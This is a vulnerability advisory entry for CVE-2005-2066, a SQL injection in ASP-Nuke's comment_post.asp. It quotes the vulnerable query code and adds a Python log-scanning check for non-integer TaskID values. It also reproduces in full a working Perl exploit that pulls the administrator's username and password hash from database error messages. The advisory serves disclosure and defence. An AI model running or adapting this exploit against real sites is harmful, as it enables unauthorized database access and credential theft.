ASP-Nuke 'comment_post.asp' Remote SQL Injection Vulnerability

Vulnerability ID: 1108897
Vulnerability type: SQL injection
Published: 2005-06-27
Updated: 2005-10-20
CVE ID: CVE-2005-2066
CNNVD ID: CNNVD-200506-222
Platform: ASP
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/1071
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-222
|Vulnerability details
ASP-Nuke is an open-source software application for running community-based sites on a web server. ASP-Nuke contains a SQL injection vulnerability that a remote attacker can exploit to gain unauthorized access to the database. The cause is that user input is not properly filtered. See lines 36 and 75 of /module/support/task/comment_post.asp:

    ...
    nTaskID = steNForm("TaskID")
    ...
    If sErrorMsg = "" Then
        ' prevent dup posting here
        sStat = "SELECT TaskID " & _
                "FROM tblTaskComment " & _
                "WHERE TaskID = " & nTaskID & " " & _
                "AND Subject = '" & Replace(sSubject, "'", "''") & "' " & _
                "AND Body LIKE '" & Replace(sBody, "'", "''") & "'"
    ...
    ?>

The TaskID parameter is not checked in any way: while the string parameters sSubject and sBody have their single quotes doubled by Replace(), the value of TaskID is concatenated into the SQL query unfiltered, which leads to SQL injection. An attacker who successfully exploits this vulnerability can gain complete control of the underlying database system.
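The fix the code above lacks is a check that TaskID is a plain integer before it reaches the query; the same check is useful when reviewing web server logs for attempts against this page. The following is an added example (not ASP-Nuke code and not from the advisory) that applies that check to constructed IIS W3C log lines; it assumes the field order shown in the embedded `#Fields:` header and that TaskID is a positive integer key, as its use in `WHERE TaskID =` suggests.

```python
import re
from urllib.parse import parse_qs

# The vulnerable query escapes the string parameters with Replace(..., "'", "''")
# but concatenates TaskID raw. For a numeric column the only value that cannot
# change the generated statement is a plain integer, so that is the whole check.
# (Assumption: TaskID is a positive integer key, as "WHERE TaskID = " suggests.)
TASK_ID_RE = re.compile(r"^[0-9]{1,9}$")

def task_id_is_clean(value: str) -> bool:
    """True only if the value could not alter the generated SQL statement."""
    return bool(TASK_ID_RE.match(value.strip()))

# Constructed IIS W3C log lines for the example (not real traffic).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query sc-status c-ip
2005-06-27 10:00:01 GET /aspnuke/module/support/task/comment_post.asp TaskID=42 200 192.0.2.10
2005-06-27 10:00:05 GET /aspnuke/module/support/task/comment_post.asp TaskID=Username 500 192.0.2.77
2005-06-27 10:00:06 GET /aspnuke/module/support/task/comment_post.asp TaskID=Password 500 192.0.2.77
2005-06-27 10:00:09 GET /aspnuke/module/support/task/comment_post.asp TaskID=42%27 500 192.0.2.77
2005-06-27 10:00:12 GET /aspnuke/index.asp - 200 192.0.2.10
"""

def find_suspicious(log_text: str) -> list[dict]:
    """Return requests to comment_post.asp whose TaskID is not a plain integer."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        date, time, method, stem, query, status, client = line.split()
        if not stem.lower().endswith("/module/support/task/comment_post.asp"):
            continue
        # parse_qs URL-decodes the value, so %27 is checked as the quote it stands for.
        params = parse_qs(query, keep_blank_values=True) if query != "-" else {}
        for raw in params.get("TaskID", []):
            if not task_id_is_clean(raw):
                hits.append({"client": client, "task_id": raw,
                             "status": status, "time": f"{date} {time}"})
    return hits

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} TaskID={hit['task_id']!r} status={hit['status']}")
```

A 500 status next to a non-numeric TaskID is the signature of the type-conversion error the exploit on this page parses, so those rows merit the closest look.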
|Vulnerability EXP
#!/usr/bin/perl -w
#
# SQL Injection Exploit for ASPNuke <= 0.80
# This exploit retrieves the username of the administrator of the board and his password, hashed with SHA256
# Related advisory: http://www.securityfocus.com/archive/1/403479/30/0/threaded
# Discovered and Coded by Alberto Trivero

use LWP::Simple;

print "\n\t===============================\n";
print "\t= Exploit for ASPNuke <= 0.80 =\n";
print "\t=     by Alberto Trivero      =\n";
print "\t===============================\n\n";

if(@ARGV!=1 or !($ARGV[0]=~m/http/)) {
   print "Usage:\nperl $0 [full_target_path]\n\nExamples:\nperl $0 http://www.example.com/aspnuke/\n";
   exit(0);
}

# The value is read back from the database error message echoed in the page body.
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Username") || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] Username of admin is: $1\n";
print "[-] Unable to retrieve Username\n" if(!$1);
$page=get($ARGV[0]."module/support/task/comment_post.asp?TaskID=Password") || die "[-] Unable to retrieve: $!";
$page=~m/the varchar value '(.*?)' to a column/ && print "[+] SHA256 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# milw0rm.com [2005-06-27]
|References

Source: BID
Name: 14064
Link: http://www.securityfocus.com/bid/14064
Source: BUGTRAQ
Name: 20050626 M4DR007-07SA (security advisory): Multiple vulnerabilities in ASPNuke 0.80
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111989223906484&w=2
Source: BUGTRAQ
Name: 20050627 SQL Injection Exploit for ASPNuke <= 0.80
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111999188612055&w=2
